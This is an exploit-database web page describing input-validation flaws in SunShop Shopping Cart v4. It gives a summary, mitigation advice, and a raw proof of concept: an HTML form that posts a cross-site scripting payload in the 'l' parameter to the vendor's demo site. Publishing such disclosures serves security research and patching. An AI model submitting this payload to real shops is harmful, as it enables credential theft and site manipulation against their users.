Notice: Function _load_textdomain_just_in_time was called incorrectly. Translation loading for the wp-pagenavi domain was triggered too early. This is usually an indicator for some code in the plugin or theme running too early. Translations should be loaded at the init action or later. Please see Debugging in WordPress for more information. (This message was added in version 6.7.0.) in /home/u918112125/domains/exploit.company/public_html/wp-includes/functions.php on line 6114
Multiple Input-Validation Vulnerabilities in TurnkeyWebTools SunShop Shopping Cart - exploit.company
header-logo
Suggest Exploit
vendor:
SunShop Shopping Cart
by:
7.5
CVSS
HIGH
Input-Validation
20
CWE
Product Name: SunShop Shopping Cart
Affected Version From: SunShop Shopping Cart v4
Affected Version To:
Patch Exists: NO
Related CWE:
CPE:
Metasploit:
Other Scripts:
Platforms Tested:

Multiple Input-Validation Vulnerabilities in TurnkeyWebTools SunShop Shopping Cart

The TurnkeyWebTools SunShop Shopping Cart is vulnerable to multiple input-validation vulnerabilities. These vulnerabilities occur due to insufficient sanitization of user-supplied data. Exploiting these vulnerabilities can lead to various attacks such as stealing authentication credentials, controlling site rendering, bypassing authentication, accessing/modifying data, and exploiting latent vulnerabilities in the database implementation.

Mitigation:

To mitigate these vulnerabilities, it is recommended to sanitize and validate user-supplied data before processing it. Implementing secure coding practices and input-validation mechanisms can help prevent these issues.
Source

Exploit-DB raw data:

source: https://www.securityfocus.com/bid/23856/info
 
TurnkeyWebTools SunShop Shopping Cart is prone to multiple input-validation vulnerabilities because it fails to sufficiently sanitize user-supplied data.
 
Exploiting these issues may allow an attacker to steal cookie-based authentication credentials, control how the site is rendered to the user, bypass the authentication mechanism, access or modify data, or exploit latent vulnerabilities in the underlying database implementation. Other attacks are also possible.
 
SunShop Shopping Cart v4 is reported vulnerable; other versions may also be affected. 

<form action="http://demos.turnkeywebtools.com/ss4/index.php" method="post">
<input name="l" size=75 value="<script %0a%0d>alert(1);</script>">
<input name="remove[0]" type="hidden" value="off">
<input name="quantity[0:49]" type="hidden" value="1">
<input name="remove[1]" type="hidden" value="off">
<input name="quantity[1:50]" type="hidden" value="1">
<input name="remove[2]" type="hidden" value="off">
<input name="quantity[2:55]" type="hidden" value="1">
<input name="remove[3]" type="hidden" value="off">
<input name="quantity[3:42]" type="hidden" value="1">
<input name="remove[4]" type="hidden" value="off">
<input name="quantity[4:51]" type="hidden" value="1">
<input name="coupon" type="hidden" value="email@address.com">
<input type=submit value="Execute Attack on variable 'l' in index.php" class="button">
</form>

Navigation

Suggest Exploit

Services By CQR